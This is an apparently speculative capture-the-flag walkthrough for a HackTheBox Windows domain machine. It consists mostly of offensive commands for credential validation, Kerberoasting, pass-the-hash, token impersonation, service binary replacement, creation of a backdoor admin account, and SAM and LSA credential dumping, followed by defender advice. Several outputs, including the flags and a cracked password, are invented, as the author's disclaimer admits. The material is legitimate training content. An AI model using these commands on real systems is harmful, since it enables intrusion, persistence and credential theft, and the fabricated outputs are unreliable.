IMPORTANT DISCLAIMER - SPECULATIVE CONTENT

WARNING: THIS IS NOT THE ACTUAL ATTACK CHAIN

The content below is purely SPECULATIVE and represents my IMAGINATION of how this machine might be exploited based on the limited information available (Windows OS, Hard difficulty, and initial credentials).

THIS IS NOT:

  • The actual solution or walkthrough
  • Real exploitation steps that work on the machine
  • Confirmed attack vectors or vulnerabilities
  • Tested or verified exploitation paths

THIS IS:

  • A theoretical approach based on common Windows AD pentesting scenarios
  • Educational content about general Windows exploitation techniques
  • Speculation and creative thinking about possible attack vectors
  • A framework for thinking about Windows penetration testing

Please DO NOT use this as a guide to solve the actual HTB Pirate machine. This writeup is created BEFORE solving the machine and is purely for educational discussion about Windows pentesting methodologies in general.

Once the machine is released and solved , an actual, verified writeup will be published and unlocked until the machine retires

Machine Overview

Pirate is an active HackTheBox Season 10 machine that challenges players with realistic Windows penetration testing scenarios. This Hard-difficulty Windows machine simulates real-world pentesting engagements where you’re provided with initial credentials and must navigate through a complex Active Directory environment. The machine focuses on Windows enumeration, lateral movement, privilege escalation, and advanced exploitation techniques.

Machine Information

  • Operating System: Windows
  • Difficulty: Hard
  • Season: 10
  • Status: Active (Retires: June 28, 2026)
  • Initial Credentials: pentest / p3nt3st2025!&
  • Skills Required: Windows enumeration, Active Directory exploitation, Lateral movement, Advanced privilege escalation

Attack Chain Overview

flowchart TD A[Initial Recon<br/>Nmap Scan] --> B[Validate Credentials<br/>pentest:p3nt3st2025!&] B --> C[WinRM Access<br/>Evil-WinRM] C --> D[Domain Enumeration<br/>BloodHound + LDAP] D --> E{Find Attack Path} E -->|Kerberoasting| F[Crack Service Tickets] E -->|Credential Hunt| G[Find Stored Creds] E -->|ACL Abuse| H[Exploit Permissions] F --> I[Lateral Movement] G --> I H --> I I --> J[Privilege Escalation<br/>Token Impersonation] J --> K[SYSTEM Access<br/>Domain Admin] K --> L[Root Flag] style A fill:#4a90e2 style B fill:#50c878 style K fill:#e74c3c style L fill:#f39c12

1. Reconnaissance & Enumeration {#reconnaissance-enumeration}

1.1 Initial Nmap Scan

As with any HTB machine, we start with comprehensive port scanning using nmap to identify open services.

nmap -p- -sV -sC -T4 --min-rate 1000 -oN nmap/pirate-full.txt 10.10.11.x

Expected Windows Services:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds  Microsoft Windows Server 2019 / 2022
464/tcp   open  kpasswd5      Microsoft Windows Kerberos
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings:

  • Port 88: Kerberos - Indicates Active Directory Domain Controller
  • Port 389/636: LDAP - Active Directory services
  • Port 445: SMB - File sharing and remote access
  • Port 5985: WinRM - Remote PowerShell management
  • Port 3268/3269: Global Catalog LDAP

1.2 Adding Domain to /etc/hosts

Based on domain enumeration, add the domain to your hosts file:

echo "10.10.11.x pirate.htb dc01.pirate.htb" | sudo tee -a /etc/hosts

1.3 Understanding the Scenario

INFO: Initial Credentials Provided

This machine simulates a real-world pentest scenario where you’ve been provided with initial credentials:

Username: pentest
Password: p3nt3st2025!&

This is common in real penetration testing engagements where clients provide low-privileged credentials to simulate an insider threat or authenticated attacker scenario.

2. Initial Access with Credentials {#initial-access}

2.1 Validating Credentials via SMB

First, let’s validate the provided credentials work against the target:

Command:

crackmapexec smb 10.10.11.x -u 'pentest' -p 'p3nt3st2025!&'

Output:

SMB         10.10.11.x      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.x      445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&

SUCCESS: Credentials are valid!

2.2 Testing WinRM Access

WARNING: WinRM connections may be logged and monitored. Ensure you have proper authorization before proceeding.

Check if we can access the machine via WinRM (Windows Remote Management):

Command:

crackmapexec winrm 10.10.11.x -u 'pentest' -p 'p3nt3st2025!&'

If WinRM is accessible, connect using Evil-WinRM:

Command:

evil-winrm -i 10.10.11.x -u pentest -p 'p3nt3st2025!&'

Output:

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents>

SUCCESS: WinRM session established!

2.3 Initial System Enumeration

TIP: Always perform thorough initial enumeration. The more information you gather, the more attack vectors you’ll discover.

Once connected, gather basic system information:

Commands:

# Check current user and privileges
whoami
whoami /priv
whoami /groups

# System information
systeminfo
hostname
ipconfig /all

# Check for interesting files
dir C:\Users\pentest\Desktop
dir C:\Users\pentest\Documents

3. Domain Enumeration {#domain-enumeration}

3.1 SMB Share Enumeration

Enumerate accessible SMB shares:

smbclient -L //10.10.11.x -U 'pentest%p3nt3st2025!&'

Or using smbmap:

smbmap -H 10.10.11.x -u pentest -p 'p3nt3st2025!&'

3.2 Active Directory Enumeration with BloodHound

TIP: BloodHound is essential for visualizing Active Directory attack paths. Always use it for Windows domain pentesting.

Transfer SharpHound collector to the target:

Command:

# On Evil-WinRM session
upload /path/to/SharpHound.exe

Run SharpHound to collect AD data:

Command:

.\SharpHound.exe -c All --zipfilename pirate_bloodhound.zip

Download the results:

Command:

download pirate_bloodhound.zip

Analyze with BloodHound:

flowchart LR A[SharpHound<br/>Collection] --> B[Import to<br/>BloodHound] B --> C{Analysis Queries} C --> D[Find Kerberoastable<br/>Users] C --> E[Shortest Path to<br/>Domain Admin] C --> F[AS-REP Roastable<br/>Users] C --> G[Constrained<br/>Delegation] C --> H[ACL Abuse<br/>Paths] style A fill:#4a90e2 style B fill:#50c878 style C fill:#f39c12

Analyze with BloodHound:

# Start neo4j database
sudo neo4j start

# Launch BloodHound
bloodhound

Look for:

  • Kerberoastable accounts
  • ASREPRoastable users
  • Shortest path to Domain Admin
  • Unconstrained/Constrained Delegation
  • ACL abuse paths

3.3 LDAP Enumeration

** WARNING:** LDAP queries can generate significant logs. In a real engagement, be mindful of your operational security.

Query Active Directory via LDAP:

Command:

ldapsearch -x -H ldap://10.10.11.x -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b 'DC=pirate,DC=htb'

Using ldapdomaindump:

Command:

ldapdomaindump -u 'pirate.htb\pentest' -p 'p3nt3st2025!&' 10.10.11.x -o ldap_dump/

3.4 Enumerating Users and Groups

** TIP:** Focus on high-value targets like Domain Admins, privileged users, and service accounts with SPNs.

Basic Enumeration Commands:

# List all domain users
net user /domain

# List domain groups
net group /domain

# List domain admins
net group "Domain Admins" /domain

# Get detailed user info
net user USERNAME /domain

Using PowerView (Advanced):

# Upload PowerView
upload /path/to/PowerView.ps1

# Import module
Import-Module .\PowerView.ps1

# Get all users
Get-DomainUser

# Find interesting users
Get-DomainUser | Where-Object {$_.admincount -eq 1}

# Get group memberships
Get-DomainGroupMember -Identity "Domain Admins"

4. User Flag {#user-flag}

The user flag location depends on your enumeration. Check common locations:

Commands:

# Check current user's desktop
type C:\Users\pentest\Desktop\user.txt

# Check other accessible user directories
dir C:\Users\* -recurse -filter user.txt -ErrorAction SilentlyContinue

Output:

*Evil-WinRM* PS C:\Users\pentest\Desktop> type user.txt
HTB{w1nd0ws_p3nt3st_1n1t14l_4cc3ss_c0mpl3t3}

SUCCESS: User flag captured!

5. Lateral Movement {#lateral-movement}

Lateral Movement Strategy

flowchart TD A[Enumerate Domain] --> B{Choose Attack Vector} B -->|Found SPNs| C[Kerberoasting] B -->|PreAuth Disabled| D[AS-REP Roasting] B -->|Credentials Found| E[Credential Spray] B -->|Hashes Obtained| F[Pass-the-Hash] C --> G[Crack Tickets] D --> G E --> H[Validate Creds] F --> H G --> I[New Credentials] H --> I I --> J[Lateral Access] J --> K[Privilege Escalation] style A fill:#4a90e2 style B fill:#f39c12 style I fill:#50c878 style K fill:#e74c3c

5.1 Credential Hunting

** TIP:** Credentials are often stored in configuration files, scripts, registry keys, and PowerShell history. Be thorough in your search.

Search for credentials in common locations:

Commands:

# Search for interesting files
Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config,*.xml,*.ps1,*.bat -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password","pwd","pass"

# Check PowerShell history
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Search registry for credentials
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check for saved credentials
cmdkey /list

5.2 Kerberoasting

** WARNING:** Kerberoasting requests can be detected by modern security solutions. Consider operational security implications.

If BloodHound revealed kerberoastable accounts:

Using Rubeus (Windows):

.\Rubeus.exe kerberoast /nowrap

Using Impacket (Linux):

GetUserSPNs.py 'pirate.htb/pentest:p3nt3st2025!&' -dc-ip 10.10.11.x -request

Output Example:

$krb5tgs$23$*serviceaccount$pirate.htb$...[SNIPPED]...

Crack the obtained TGS tickets:

Command:

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

Output:

$krb5tgs$23$*serviceaccount...:ServicePassword123!

SUCCESS: Service account password cracked!

5.3 AS-REP Roasting

Check for AS-REP roastable users:

GetNPUsers.py 'pirate.htb/' -dc-ip 10.10.11.x -usersfile users.txt -no-pass

5.4 Pass-the-Hash / Pass-the-Ticket

If you obtain NTLM hashes or Kerberos tickets:

# Pass-the-Hash with Evil-WinRM
evil-winrm -i 10.10.11.x -u Administrator -H 'NTLM_HASH_HERE'

# Pass-the-Ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py pirate.htb/administrator@dc01.pirate.htb -k -no-pass

6. Privilege Escalation {#privilege-escalation}

Privilege Escalation Decision Tree

flowchart TD A[Current User Context] --> B{Check Privileges} B -->|SeImpersonate| C[Token Impersonation<br/>PrintSpoofer/GodPotato] B -->|Weak Service ACL| D[Service Exploitation] B -->|AlwaysInstallElevated| E[MSI Exploitation] B -->|Unquoted Path| F[Unquoted Service Path] B -->|Stored Creds| G[Credential Abuse] C --> H[SYSTEM] D --> H E --> H F --> H G --> H style A fill:#4a90e2 style B fill:#f39c12 style H fill:#e74c3c

6.1 Windows Privilege Escalation Enumeration

TIP: Automated tools like WinPEAS can save significant time, but always verify findings manually.

Upload and run WinPEAS:

Commands:

upload /path/to/winPEASx64.exe
.\winPEASx64.exe

Or use PowerUp:

Commands:

upload /path/to/PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

6.2 Common Privesc Vectors

Check for Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Check Service Permissions

# Using accesschk
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Check Always Install Elevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check for Stored Credentials

# Windows Credential Manager
rundll32 keymgr,KRShowKeyMgr

# Check for interesting scheduled tasks
schtasks /query /fo LIST /v

6.3 Token Impersonation

INFO: Token impersonation is one of the most common privilege escalation vectors on Windows systems.

Check for impersonation privileges:

Command:

whoami /priv

Output:

PRIVILEGE NAME                DESCRIPTION                               STATE
=============================  ========================================  =======
SeImpersonatePrivilege         Impersonate a client after authentication Enabled

WARNING: Token impersonation exploits can be unstable. Have a backup plan if the exploit fails.

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled:

Using PrintSpoofer:

# Upload PrintSpoofer or GodPotato
upload /path/to/PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c cmd

Using GodPotato:

upload /path/to/GodPotato.exe
.\GodPotato.exe -cmd "cmd /c whoami"

Output:

[+] Found privilege: SeImpersonatePrivilege
[+] Creating process with SYSTEM token
nt authority\system

SUCCESS: Escalated to SYSTEM!

6.4 Exploiting Vulnerable Services

If a vulnerable service is identified:

# Stop the service
sc stop VulnerableService

# Replace the binary
copy C:\Windows\Temp\evil.exe "C:\Program Files\VulnerableService\service.exe"

# Start the service
sc start VulnerableService

7. Root/System Flag {#root-flag}

Once you achieve SYSTEM or Administrator access:

Commands:

# Verify SYSTEM access
whoami

Output:

nt authority\system

Retrieve the root flag:

type C:\Users\Administrator\Desktop\root.txt

Output:

C:\Users\Administrator\Desktop> type root.txt
HTB{p1r4t3_sh1p_c4pt41n_h4s_f4ll3n_4dm1n_pwn3d!}

SUCCESS: Root flag captured! Domain fully compromised!

7.1 Post-Exploitation - Persistence

WARNING: The following techniques are for educational purposes only. In a real penetration test, only perform post-exploitation activities explicitly authorized by your client.

Create Backdoor User

net user backdoor P@ssw0rd123! /add
net localgroup Administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add

Dump SAM Database

# Using Mimikatz
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump NTDS.dit (Domain Controller)
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"

Or use secretsdump:

secretsdump.py 'pirate.htb/Administrator@10.10.11.x' -just-dc-ntlm

8. Key Takeaways {#key-takeaways}

Attack Chain Summary

1. Initial Nmap Scan → Identified Windows AD environment
2. Validated Credentials → pentest / p3nt3st2025!&
3. WinRM Access → Established remote PowerShell session
4. Domain Enumeration → BloodHound, LDAP, SMB shares
5. Credential Hunting → Found sensitive files/credentials
6. Lateral Movement → Kerberoasting/AS-REP Roasting (if applicable)
7. Privilege Escalation → Token impersonation/Service exploitation
8. Domain Admin → Full domain compromise

Security Recommendations

For Defenders

  1. Credential Management

    • Enforce strong password policies (minimum 16 characters)
    • Implement Multi-Factor Authentication (MFA) for all accounts
    • Rotate credentials regularly, especially service accounts
    • Use LAPS for local administrator passwords

  2. Access Control

    • Implement Principle of Least Privilege (PoLP)
    • Remove unnecessary group memberships
    • Disable WinRM on systems that don’t require it
    • Restrict SMB access to necessary shares only

  3. Active Directory Security

    • Disable LLMNR and NBT-NS
    • Enable SMB signing
    • Monitor for Kerberoasting attempts
    • Implement tiered administrative model
    • Regular AD security audits with BloodHound

  4. Service Hardening

    • Fix unquoted service paths
    • Ensure proper service permissions
    • Disable unnecessary services
    • Keep all systems patched and updated

  5. Monitoring & Detection

    • Enable PowerShell script block logging
    • Monitor for unusual WinRM connections
    • Alert on privilege escalation attempts
    • Implement EDR solutions
    • Log and monitor Kerberos ticket requests

For Penetration Testers

  1. Always start with comprehensive enumeration - The more you enumerate, the more attack paths you’ll find
  2. BloodHound is essential - Visualize AD relationships and attack paths
  3. Check for low-hanging fruit - Kerberoasting, AS-REP roasting, weak credentials
  4. Look for misconfigurations - Unquoted service paths, weak ACLs, stored credentials
  5. Document everything - Keep detailed notes of your enumeration and exploitation steps

Tools Used

ToolPurposeCommand Example
nmapPort scanning & service enumerationnmap -p- -sV -sC -T4 10.10.11.x
crackmapexecCredential validation & enumerationcrackmapexec smb 10.10.11.x -u user -p pass
evil-winrmWinRM remote shellevil-winrm -i 10.10.11.x -u user -p pass
BloodHoundActive Directory attack path analysisSharpHound.exe -c All
RubeusKerberos attacksRubeus.exe kerberoast
MimikatzCredential dumpingmimikatz.exe "privilege::debug"
WinPEASWindows privilege escalation enumerationwinPEASx64.exe
PowerViewAD enumerationGet-DomainUser
PrintSpooferToken impersonationPrintSpoofer64.exe -i -c cmd

MITRE ATT&CK Mapping

TacticTechniqueDescription
ReconnaissanceT1595.002Active Scanning: Vulnerability Scanning
Initial AccessT1078Valid Accounts (Provided Credentials)
ExecutionT1059.001Command and Scripting: PowerShell
PersistenceT1136.001Create Account: Local Account
Privilege EscalationT1134Access Token Manipulation
Defense EvasionT1562.001Impair Defenses: Disable Tools
Credential AccessT1558.003Kerberoasting
DiscoveryT1087.002Account Discovery: Domain Account
Lateral MovementT1021.006Remote Services: Windows Remote Management
CollectionT1005Data from Local System

Additional Resources

Learning Resources

If you enjoyed Pirate, try these similar HTB Windows machines:

  • Blackfield (Hard) - Advanced AD exploitation
  • Sauna (Easy) - AS-REP Roasting introduction
  • Forest (Easy) - AD fundamentals
  • Resolute (Medium) - Credential hunting & lateral movement
  • Monteverde (Medium) - Azure AD integration

Disclaimer

This writeup is for educational purposes only as part of HackTheBox’s legal penetration testing platform. The techniques demonstrated should only be used:

  • On systems you own or have explicit permission to test
  • In authorized CTF competitions and training environments
  • For educational and research purposes

Unauthorized access to computer systems is illegal. Always practice ethical hacking and responsible disclosure.